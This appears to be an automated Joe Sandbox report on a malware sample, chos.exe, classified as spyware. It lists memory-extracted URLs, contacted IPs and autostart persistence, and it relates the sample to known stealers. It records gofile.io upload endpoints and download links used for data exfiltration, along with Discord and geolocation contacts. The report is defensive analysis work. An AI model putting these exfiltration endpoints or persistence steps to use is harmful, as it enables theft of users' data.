http://cacerts.dig	chos.exe, 00000000.00000003.1426703249.0000018B76862000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000000.00000003.1428914450.0000018B7686F000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000000.00000003.1428547743.0000018B76862000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 0000000A.00000003.1641621400.00000243B8849000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 0000000A.00000003.1644716975.00000243B8850000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 0000000A.00000003.1645659691.00000243B8850000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 0000000A.00000003.1641645391.00000243B8850000.00000004.00000020.00020000.00000000.sdmp	false		high
https://setuptools.pypa.io/en/latest/pkg_resources.html#basic-resource-access	chos.exe, 00000002.00000003.1474920426.0000015955806000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000002.00000003.1464699665.0000015955808000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000002.00000003.1464049106.00000159557E0000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000002.00000003.1476206451.0000015955806000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000002.00000003.1473785976.0000015955806000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000002.00000003.1477854412.0000015955806000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000002.00000003.1466452584.0000015955806000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000002.00000003.1463649027.000001595553D000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000002.00000003.1463557293.00000159557E0000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1684802316.00000211B7CEA000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1687566933.00000211B7C8A000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1683693472.00000211B7CEA000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1739472575.00000211B7CFC000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1687022873.00000211B7D12000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1687448661.00000211B7CEA000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1688348710.00000211B7CEA000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1684802316.00000211B7C8A000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1698029672.00000211B7CED000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1689458854.00000211B7CEA000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1700987509.00000211B7CFC000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store4.gofile.io/uploadFileZ	curl.exe, 0000000D.00000003.1652926439.000001C952E42000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000003.1653074745.000001C952E43000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000002.1653713527.000001C952E43000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/python/cpython/issues/86361.	chos.exe, 00000002.00000003.1478340357.00000159554E7000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000002.00000003.1475894863.00000159554F4000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000002.00000003.1477382744.00000159554E8000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000002.00000003.1475182879.00000159554E7000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000002.00000003.1471998021.0000015955871000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000002.00000003.1466781370.00000159554F6000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000002.00000003.1474442517.00000159554F6000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000002.00000003.1479078693.00000159554EC000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000002.00000003.1476788640.00000159554E7000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000002.00000003.1472058557.00000159554F6000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000002.00000003.1466452584.0000015955870000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1698106515.00000211B7BC3000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1701143564.00000211B7BC3000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1688635680.00000211B7C23000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1692731139.00000211B7BC3000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1687566933.00000211B7C23000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1689458854.00000211B7BB4000.00000004.00000020.00020000.00000000.sdmp	false		high
https://httpbin.org/	chos.exe, 00000011.00000003.1703174546.00000211B826C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.apache.org/licenses/	chos.exe, 0000000A.00000003.1654672093.00000243B8843000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/pyca/cryptography/workflows/CI/badge.svg?branch=main	chos.exe, 00000000.00000003.1436317355.0000018B76865000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 0000000A.00000003.1653929981.00000243B8846000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www-cs-faculty.stanford.edu/~knuth/fasc2a.ps.gz	chos.exe, 00000002.00000003.1477854412.00000159557BC000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000002.00000003.1478209771.00000159558E3000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1699028639.00000211B7FFE000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1703493750.00000211B7FB5000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1694956038.00000211B8083000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1740812158.00000211B7F9A000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1695029112.00000211B80C9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://cacerts.digD	chos.exe, 00000000.00000003.1426703249.0000018B76862000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000000.00000003.1428914450.0000018B7686F000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000000.00000003.1428547743.0000018B76862000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://docs.python.org/3/reference/import.html#finders-and-loaders	chos.exe, 0000000A.00000003.1664958699.00000243B8846000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store4.gofile.io/uploadFileH	cmd.exe, 00000007.00000002.1628124725.00000160E33C0000.00000004.00000020.00020000.00000000.sdmp	false		high
https://img.shields.io/badge/skeleton-2024-informational	chos.exe, 0000000A.00000003.1664958699.00000243B8846000.00000004.00000020.00020000.00000000.sdmp	false		high
https://packaging.python.org/en/latest/specifications/pyproject-toml/#declaring-project-metadata-the	chos.exe, 00000011.00000003.1703493750.00000211B80F1000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1740812158.00000211B80B9000.00000004.00000020.00020000.00000000.sdmp	false		high
http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535	chos.exe, 00000011.00000003.1703493750.00000211B80F1000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1741361132.00000211B81C8000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1703493750.00000211B7FB5000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1703493750.00000211B81B8000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1703493750.00000211B822E000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1709016306.00000211B81B9000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1740812158.00000211B80B9000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cryptography.io/en/latest/installation/	chos.exe, 00000000.00000003.1436317355.0000018B76865000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 0000000A.00000003.1653929981.00000243B8846000.00000004.00000020.00020000.00000000.sdmp	false		high
https://docs.python.org/3/library/multiprocessing.html	chos.exe, 00000011.00000003.1703493750.00000211B7FB5000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1740812158.00000211B7F9A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store4.gofile.io/uploadFileTEM32	curl.exe, 00000010.00000002.1681576960.000001DB46B84000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store4.gofile.io/uploadFilecurl	curl.exe, 00000009.00000002.1627146371.000001791A2F0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000002.1653713527.000001C952E00000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000010.00000002.1681576960.000001DB46B70000.00000004.00000020.00020000.00000000.sdmp	false		high
http://hg.python.or	chos.exe, 00000011.00000003.1703493750.00000211B7FB5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cryptography.io/en/latest/security/	chos.exe, 00000000.00000003.1436317355.0000018B76865000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 0000000A.00000003.1653929981.00000243B8846000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.xrampsecurity.com/XGCA.crl0	chos.exe, 00000011.00000003.1740812158.00000211B7F9A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://urllib3.rQ	chos.exe, 00000011.00000003.1741361132.00000211B81C8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.cert.fnmt.es/dpcs/	chos.exe, 00000011.00000003.1741361132.00000211B81C8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://setuptools.pypa.io/en/latest/pkg_resources.html	chos.exe, 00000002.00000003.1464049106.00000159557E0000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000002.00000003.1463649027.000001595553D000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000002.00000003.1463557293.00000159557E0000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1683693472.00000211B7CEA000.00000004.00000020.00020000.00000000.sdmp	false		high
https://google.com/mail	chos.exe, 00000011.00000003.1741361132.00000211B81C8000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1703493750.00000211B7FB5000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1703493750.00000211B81B8000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1740812158.00000211B7F9A000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1703174546.00000211B826C000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1706710429.00000211B81E4000.00000004.00000020.00020000.00000000.sdmp	false		high
https://img.shields.io/pypi/v/importlib_metadata.svg	chos.exe, 0000000A.00000003.1664958699.00000243B8846000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store4.gofile.io/uploadFileqHv	cmd.exe, 0000000B.00000002.1654510529.000001B934D00000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.rfc-editor.org/info/rfc7253	chos.exe, 00000011.00000003.1742097208.00000211B8D94000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/pyca/cryptography/issues	chos.exe, 0000000A.00000003.1653929981.00000243B8846000.00000004.00000020.00020000.00000000.sdmp	false		high
https://gofile.io/d/9ytA9K	curl.exe, 0000000D.00000003.1652229789.000001C952E28000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000003.1651751047.000001C952E80000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000003.1652087177.000001C952E9A000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000003.1651140358.000001C952E67000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000003.1651140358.000001C952E80000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000003.1651140358.000001C952E9A000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000002.1653713527.000001C952E9A000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000003.1651751047.000001C952E67000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000003.1652087177.000001C952E80000.00000004.00000020.00020000.00000000.sdmp	false		high
https://readthedocs.org/projects/cryptography/badge/?version=latest	chos.exe, 00000000.00000003.1436317355.0000018B76865000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 0000000A.00000003.1653929981.00000243B8846000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.	chos.exe, 00000011.00000003.1741361132.00000211B81C8000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1703493750.00000211B81B8000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1709016306.00000211B81B9000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store4.gofile.io/uploadFileo	cmd.exe, 00000007.00000002.1628124725.00000160E33F2000.00000004.00000020.00020000.00000000.sdmp	false		high
http://google.com/	chos.exe, 00000011.00000003.1703493750.00000211B8129000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1703493750.00000211B822E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://mahler:8092/site-updates.py	chos.exe, 00000011.00000003.1699028639.00000211B7FFE000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1703493750.00000211B7FB5000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1694956038.00000211B8083000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1740812158.00000211B7F9A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store4.gofile.io/J	cmd.exe, 0000002F.00000002.1912110090.00000263A5EEB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://tools.ietf.org/html/rfc7231#section-4.3.6)	chos.exe, 00000011.00000003.1703493750.00000211B7FB5000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1697091350.00000211B80F9000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1740812158.00000211B7F9A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/pyca/cryptography	chos.exe, 00000000.00000003.1436317355.0000018B76865000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 0000000A.00000003.1653929981.00000243B8846000.00000004.00000020.00020000.00000000.sdmp	false		high
http://blog.cryptographyengineering.com/2012/05/how-to-choose-authenticated-encryption.html	chos.exe, 00000011.00000003.1741361132.00000211B81C8000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1742097208.00000211B8D94000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1740812158.00000211B7F9A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cryptography.io/	chos.exe, 0000000A.00000003.1653929981.00000243B8846000.00000004.00000020.00020000.00000000.sdmp	false		high
https://httpbin.org/post	chos.exe, 00000011.00000003.1703493750.00000211B7FB5000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1740812158.00000211B7F9A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warningsN	chos.exe, 00000011.00000003.1703493750.00000211B822E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/pyca/cryptography/	chos.exe, 00000000.00000003.1436317355.0000018B76865000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 0000000A.00000003.1653929981.00000243B8846000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/Ousret/charset_normalizer	chos.exe, 00000011.00000003.1706710429.00000211B8253000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1741361132.00000211B81C8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://img.shields.io/pypi/pyversions/importlib_metadata.svg	chos.exe, 0000000A.00000003.1664958699.00000243B8846000.00000004.00000020.00020000.00000000.sdmp	false		high
https://tidelift.com/badges/package/pypi/importlib-metadata	chos.exe, 0000000A.00000003.1664958699.00000243B8846000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/urllib3/urllib3/issues/2920	chos.exe, 00000011.00000003.1703174546.00000211B826C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store4.gofile.io/	cmd.exe, 00000007.00000002.1628124725.00000160E33CB000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.1850416619.0000023A6EC6B000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.securetrust.com/SGCA.crl0	chos.exe, 00000011.00000003.1740812158.00000211B80B9000.00000004.00000020.00020000.00000000.sdmp	false		high
https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_data	chos.exe, 00000011.00000003.1674571294.00000211B77F5000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1680761245.00000211B77FD000.00000004.00000020.00020000.00000000.sdmp	false		high
https://yahoo.com/	chos.exe, 00000011.00000003.1741361132.00000211B81C8000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1703493750.00000211B7FB5000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1703493750.00000211B81B8000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1740812158.00000211B7F9A000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1703174546.00000211B826C000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1706710429.00000211B81E4000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.securetrust.com/STCA.crl0	chos.exe, 00000011.00000003.1740812158.00000211B80B9000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/python/importlib_metadata/actions?query=workflow%3A%22tests%22	chos.exe, 0000000A.00000003.1664958699.00000243B8846000.00000004.00000020.00020000.00000000.sdmp	false		high
https://gofile.io/d/ZbU3df	curl.exe, 00000009.00000003.1626823097.000001791A33F000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000009.00000003.1626666877.000001791A373000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000009.00000003.1626540508.000001791A373000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000009.00000003.1626666877.000001791A359000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000009.00000003.1626757795.000001791A373000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000009.00000003.1626737616.000001791A33E000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000009.00000003.1626540508.000001791A359000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000009.00000003.1626784083.000001791A318000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000009.00000002.1627252326.000001791A33F000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000009.00000003.1626619878.000001791A33E000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000009.00000003.1626937486.000001791A33F000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6	chos.exe, 00000011.00000003.1701567430.00000211B80EE000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1703493750.00000211B7FB5000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1740812158.00000211B7F9A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store4.gofile.io.uploadFile	curl.exe, 00000031.00000002.1909714243.0000028AD0A71000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://html.spec.whatwg.org/multipage/	chos.exe, 00000011.00000003.1741361132.00000211B81C8000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1703493750.00000211B81B8000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 00000011.00000003.1709016306.00000211B81B9000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.quovadisglobal.com/cps0	chos.exe, 00000011.00000003.1740812158.00000211B7F9A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cryptography.io/en/latest/changelog/	chos.exe, 00000000.00000003.1436317355.0000018B76865000.00000004.00000020.00020000.00000000.sdmp, chos.exe, 0000000A.00000003.1653929981.00000243B8846000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.rfc-editor.org/rfc/rfc8259#section-8.1	chos.exe, 00000011.00000003.1703174546.00000211B826C000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.26.12.205	api.ipify.org	United States	13335	CLOUDFLARENETUS	false
162.159.138.232	discord.com	United States	13335	CLOUDFLARENETUS	false
45.112.123.126	api.gofile.io	Singapore	16509	AMAZON-02US	false
159.89.102.253	geolocation-db.com	United States	14061	DIGITALOCEAN-ASNUS	false
31.14.70.245	store4.gofile.io	Virgin Islands (BRITISH)	199483	LINKER-ASFR	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1574329
Start date and time:	2024-12-13 08:43:46 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 32s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	51
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	chos.exe
Detection:	MAL
Classification:	mal80.adwa.spyw.winEXE@77/198@5/6
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 79 Number of non-executed functions: 115
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 20.12.23.50
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtQueryVolumeInformationFile calls found.
VT rate limit hit for: chos.exe

Simulations

Behavior and APIs

Time	Type	Description
08:44:54	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.26.12.205	jgbC220X2U.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/?format=text
	xKvkNk9SXR.exe	Get hash	malicious	TrojanRansom	Browse	api.ipify.org/
	GD8c7ARn8q.exe	Get hash	malicious	TrojanRansom	Browse	api.ipify.org/
	8AbMCL2dxM.exe	Get hash	malicious	RCRU64, TrojanRansom	Browse	api.ipify.org/
	Simple2.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	Ransomware Mallox.exe	Get hash	malicious	Targeted Ransomware	Browse	api.ipify.org/
	Yc9hcFC1ux.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	6706e721f2c06.exe	Get hash	malicious	Remcos	Browse	api.ipify.org/
	perfcc.elf	Get hash	malicious	Xmrig	Browse	api.ipify.org/
	SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe	Get hash	malicious	RDPWrap Tool	Browse	api.ipify.org/
162.159.138.232	apDMcnqqWs.exe	Get hash	malicious	Unknown	Browse
	Cooperative Agreement0000800380.docx.exe	Get hash	malicious	Babadeda, Blank Grabber	Browse
	speedymaqing.exe	Get hash	malicious	Python Stealer, Discord Token Stealer	Browse
	RuntimeusererVers.exe	Get hash	malicious	Python Stealer	Browse
	file.exe	Get hash	malicious	CStealer	Browse
	dens.exe	Get hash	malicious	Python Stealer, Exela Stealer, Waltuhium Grabber	Browse
	yuki.exe	Get hash	malicious	Luna Stealer	Browse
	file.exe	Get hash	malicious	Growtopia	Browse
	SecuriteInfo.com.Win64.Malware-gen.13500.20938.exe	Get hash	malicious	Python Stealer, Exela Stealer	Browse
	runtime.exe	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
discord.com	shost.exe	Get hash	malicious	Python Stealer, Muck Stealer	Browse	162.159.136.232
	sppawx.exe	Get hash	malicious	Blank Grabber	Browse	162.159.135.232
	ahost.exe	Get hash	malicious	Blank Grabber	Browse	162.159.135.232
	wsapx.exe	Get hash	malicious	Blank Grabber	Browse	162.159.136.232
	WE8zqotCFj.exe	Get hash	malicious	Blank Grabber, Umbral Stealer	Browse	162.159.137.232
	ozAxx9uGHu.exe	Get hash	malicious	Blank Grabber, Umbral Stealer	Browse	162.159.136.232
	eCXXUk54sx.exe	Get hash	malicious	Divulge Stealer	Browse	162.159.128.233
	apDMcnqqWs.exe	Get hash	malicious	Unknown	Browse	162.159.138.232
	https://github.com/Matty77o/malware-samples-m-h/blob/main/TheTrueFriend.exe	Get hash	malicious	Unknown	Browse	162.159.135.232
	file.exe	Get hash	malicious	Amadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, StormKitty, VenomRAT	Browse	162.159.128.233
store4.gofile.io	Pdf Reader.exe	Get hash	malicious	Stealerium	Browse	31.14.70.245
	file.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	31.14.70.245
	FpiUD4nYpj.exe	Get hash	malicious	LummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRAT	Browse	31.14.70.245
	e9ddd60081c3e01d049dc4d5ed5f150afc27ffbbdb8b6adf558fa677ad8875dd_dump.exe	Get hash	malicious	LummaC, AsyncRAT, Go Injector, LummaC Stealer, SmokeLoader, VenomRAT	Browse	31.14.70.245
	file.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	31.14.70.245
	7Y18r(14).exe	Get hash	malicious	LummaC, AsyncRAT, Bdaejec, Go Injector, LummaC Stealer, SmokeLoader, VenomRAT	Browse	31.14.70.245
	w85VkFOxiD.exe	Get hash	malicious	Python Stealer, CStealer, NiceRAT, Quasar	Browse	31.14.70.245
	9afaXJv52z.exe	Get hash	malicious	Exela Stealer	Browse	31.14.70.245
	NoBackend.exe	Get hash	malicious	Unknown	Browse	31.14.70.245
	Microsoft_Teams_SC.ba#.bat	Get hash	malicious	Unknown	Browse	31.14.70.245
api.ipify.org	http://ap2vxmyqxf.ballyentoe.shop	Get hash	malicious	EvilProxy, HTMLPhisher	Browse	104.26.12.205
	installer.exe	Get hash	malicious	Unknown	Browse	104.26.12.205
	installer.exe	Get hash	malicious	Unknown	Browse	172.67.74.152
	zapret.exe	Get hash	malicious	Unknown	Browse	104.26.12.205
	Rockwool-Msg-S9039587897.pdf	Get hash	malicious	EvilProxy, HTMLPhisher	Browse	104.26.12.205
	RFQ-004282A.Teknolojileri A.S.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	Employee_Letter.pdf	Get hash	malicious	HTMLPhisher	Browse	104.26.12.205
	discord.exe	Get hash	malicious	Unknown	Browse	172.67.74.152
	jgbC220X2U.exe	Get hash	malicious	Unknown	Browse	172.67.74.152
	QUOTATION#08670.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	3181425fa7464801a03868a1adf86bc1.ps1	Get hash	malicious	Unknown	Browse	104.21.66.79
	shost.exe	Get hash	malicious	Python Stealer, Muck Stealer	Browse	162.159.136.232
	sppawx.exe	Get hash	malicious	Blank Grabber	Browse	162.159.135.232
	ahost.exe	Get hash	malicious	Blank Grabber	Browse	162.159.135.232
	wsapx.exe	Get hash	malicious	Blank Grabber	Browse	162.159.136.232
	main.exe	Get hash	malicious	Unknown	Browse	104.20.4.235
	in.exe	Get hash	malicious	Babadeda, HTMLPhisher	Browse	104.17.25.14
	CVmkXJ7e0a.exe	Get hash	malicious	SheetRat	Browse	104.16.185.241
	naukri-launcher 10.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	WE8zqotCFj.exe	Get hash	malicious	Blank Grabber, Umbral Stealer	Browse	162.159.137.232
CLOUDFLARENETUS	3181425fa7464801a03868a1adf86bc1.ps1	Get hash	malicious	Unknown	Browse	104.21.66.79
	shost.exe	Get hash	malicious	Python Stealer, Muck Stealer	Browse	162.159.136.232
	sppawx.exe	Get hash	malicious	Blank Grabber	Browse	162.159.135.232
	ahost.exe	Get hash	malicious	Blank Grabber	Browse	162.159.135.232
	wsapx.exe	Get hash	malicious	Blank Grabber	Browse	162.159.136.232
	main.exe	Get hash	malicious	Unknown	Browse	104.20.4.235
	in.exe	Get hash	malicious	Babadeda, HTMLPhisher	Browse	104.17.25.14
	CVmkXJ7e0a.exe	Get hash	malicious	SheetRat	Browse	104.16.185.241
	naukri-launcher 10.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	WE8zqotCFj.exe	Get hash	malicious	Blank Grabber, Umbral Stealer	Browse	162.159.137.232
AMAZON-02US	sparc.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	18.252.132.130
